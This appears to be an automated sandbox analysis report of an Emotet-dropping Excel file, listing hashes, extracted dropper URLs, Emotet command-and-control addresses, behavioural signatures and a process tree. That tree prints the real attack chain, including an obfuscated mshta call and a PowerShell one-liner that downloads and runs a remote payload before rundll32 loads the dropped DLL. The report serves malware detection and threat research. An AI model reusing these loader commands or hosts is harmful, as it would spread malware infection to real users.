Analysis

  • max time kernel
    135s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20-01-2022 06:40

General

  • Target

    c2ce0e5d4d7eb7b429e77e7bbdf09801.xls

  • Size

    141KB

  • MD5

    c2ce0e5d4d7eb7b429e77e7bbdf09801

  • SHA1

    71b41e18f5596cf7a8fcfee18679f84d536fe822

  • SHA256

    b1ee7aa00b7884ed02a3f5ddc07419b6e8dd6e7382269d8cc5511f06431d5eaf

  • SHA512

    3dde19316fc7d34b19295eac07f71a99769fa8d4f9a8008a6b7c51fd4c0bd4dc73c5a813a6fc4a1b877a94a8157e09ef5b7e75eb64f46f723a70a20e7a990767

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fer.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fer.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c2ce0e5d4d7eb7b429e77e7bbdf09801.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1528
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:292
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:908
        • C:\Windows\SysWOW64\mshta.exe
          mshta http://0xb907d607/fer/fer.html
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1248
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1828
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2044
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:556
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:832
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Erpyterttvfc\qwtlhjtcvzznhkr.mus",ORAm
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1868
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Erpyterttvfc\qwtlhjtcvzznhkr.mus",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:852

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll
      MD5

      de7be5d20fdd37cfd7c2a1fa998ed228

      SHA1

      511392ba2358af5cb3be1c7ab0d2aec097e8ffad

      SHA256

      658a2ad2d15e649fec8612d3cbbee9cbf6f1cd7a53ea3408eb16965ec10fd159

      SHA512

      8bfd2e5bfc6521a8b8337664ca7878ba8b086301ae160eab4ef7d8df184ead348189828246c052c251482a0cad0ed61161cc36262805513132c4e80415ba7790

    • \Users\Public\Documents\ssd.dll
      MD5

      de7be5d20fdd37cfd7c2a1fa998ed228

      SHA1

      511392ba2358af5cb3be1c7ab0d2aec097e8ffad

      SHA256

      658a2ad2d15e649fec8612d3cbbee9cbf6f1cd7a53ea3408eb16965ec10fd159

      SHA512

      8bfd2e5bfc6521a8b8337664ca7878ba8b086301ae160eab4ef7d8df184ead348189828246c052c251482a0cad0ed61161cc36262805513132c4e80415ba7790

    • \Users\Public\Documents\ssd.dll
      MD5

      de7be5d20fdd37cfd7c2a1fa998ed228

      SHA1

      511392ba2358af5cb3be1c7ab0d2aec097e8ffad

      SHA256

      658a2ad2d15e649fec8612d3cbbee9cbf6f1cd7a53ea3408eb16965ec10fd159

      SHA512

      8bfd2e5bfc6521a8b8337664ca7878ba8b086301ae160eab4ef7d8df184ead348189828246c052c251482a0cad0ed61161cc36262805513132c4e80415ba7790

    • \Users\Public\Documents\ssd.dll
      MD5

      de7be5d20fdd37cfd7c2a1fa998ed228

      SHA1

      511392ba2358af5cb3be1c7ab0d2aec097e8ffad

      SHA256

      658a2ad2d15e649fec8612d3cbbee9cbf6f1cd7a53ea3408eb16965ec10fd159

      SHA512

      8bfd2e5bfc6521a8b8337664ca7878ba8b086301ae160eab4ef7d8df184ead348189828246c052c251482a0cad0ed61161cc36262805513132c4e80415ba7790

    • \Users\Public\Documents\ssd.dll
      MD5

      de7be5d20fdd37cfd7c2a1fa998ed228

      SHA1

      511392ba2358af5cb3be1c7ab0d2aec097e8ffad

      SHA256

      658a2ad2d15e649fec8612d3cbbee9cbf6f1cd7a53ea3408eb16965ec10fd159

      SHA512

      8bfd2e5bfc6521a8b8337664ca7878ba8b086301ae160eab4ef7d8df184ead348189828246c052c251482a0cad0ed61161cc36262805513132c4e80415ba7790

    • \Users\Public\Documents\ssd.dll
      MD5

      de7be5d20fdd37cfd7c2a1fa998ed228

      SHA1

      511392ba2358af5cb3be1c7ab0d2aec097e8ffad

      SHA256

      658a2ad2d15e649fec8612d3cbbee9cbf6f1cd7a53ea3408eb16965ec10fd159

      SHA512

      8bfd2e5bfc6521a8b8337664ca7878ba8b086301ae160eab4ef7d8df184ead348189828246c052c251482a0cad0ed61161cc36262805513132c4e80415ba7790

    • \Users\Public\Documents\ssd.dll
      MD5

      de7be5d20fdd37cfd7c2a1fa998ed228

      SHA1

      511392ba2358af5cb3be1c7ab0d2aec097e8ffad

      SHA256

      658a2ad2d15e649fec8612d3cbbee9cbf6f1cd7a53ea3408eb16965ec10fd159

      SHA512

      8bfd2e5bfc6521a8b8337664ca7878ba8b086301ae160eab4ef7d8df184ead348189828246c052c251482a0cad0ed61161cc36262805513132c4e80415ba7790

    • \Users\Public\Documents\ssd.dll
      MD5

      de7be5d20fdd37cfd7c2a1fa998ed228

      SHA1

      511392ba2358af5cb3be1c7ab0d2aec097e8ffad

      SHA256

      658a2ad2d15e649fec8612d3cbbee9cbf6f1cd7a53ea3408eb16965ec10fd159

      SHA512

      8bfd2e5bfc6521a8b8337664ca7878ba8b086301ae160eab4ef7d8df184ead348189828246c052c251482a0cad0ed61161cc36262805513132c4e80415ba7790

    • \Users\Public\Documents\ssd.dll
      MD5

      de7be5d20fdd37cfd7c2a1fa998ed228

      SHA1

      511392ba2358af5cb3be1c7ab0d2aec097e8ffad

      SHA256

      658a2ad2d15e649fec8612d3cbbee9cbf6f1cd7a53ea3408eb16965ec10fd159

      SHA512

      8bfd2e5bfc6521a8b8337664ca7878ba8b086301ae160eab4ef7d8df184ead348189828246c052c251482a0cad0ed61161cc36262805513132c4e80415ba7790

    • memory/292-59-0x000007FEFC261000-0x000007FEFC263000-memory.dmp
      Filesize

      8KB

    • memory/832-76-0x0000000000200000-0x0000000000226000-memory.dmp
      Filesize

      152KB

    • memory/832-82-0x0000000000ED0000-0x0000000000EF6000-memory.dmp
      Filesize

      152KB

    • memory/832-80-0x00000000003F0000-0x0000000000416000-memory.dmp
      Filesize

      152KB

    • memory/832-78-0x0000000000310000-0x0000000000336000-memory.dmp
      Filesize

      152KB

    • memory/852-96-0x0000000000850000-0x0000000000876000-memory.dmp
      Filesize

      152KB

    • memory/852-94-0x00000000007A0000-0x00000000007C6000-memory.dmp
      Filesize

      152KB

    • memory/852-98-0x0000000000930000-0x0000000000956000-memory.dmp
      Filesize

      152KB

    • memory/852-100-0x0000000000990000-0x00000000009B6000-memory.dmp
      Filesize

      152KB

    • memory/852-102-0x00000000023B0000-0x00000000023D6000-memory.dmp
      Filesize

      152KB

    • memory/1528-56-0x0000000071961000-0x0000000071963000-memory.dmp
      Filesize

      8KB

    • memory/1528-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1528-55-0x000000002F2A1000-0x000000002F2A4000-memory.dmp
      Filesize

      12KB

    • memory/1528-58-0x00000000769D1000-0x00000000769D3000-memory.dmp
      Filesize

      8KB

    • memory/1528-120-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1828-62-0x0000000002270000-0x0000000002EBA000-memory.dmp
      Filesize

      12.3MB

    • memory/1868-89-0x0000000000190000-0x00000000001B6000-memory.dmp
      Filesize

      152KB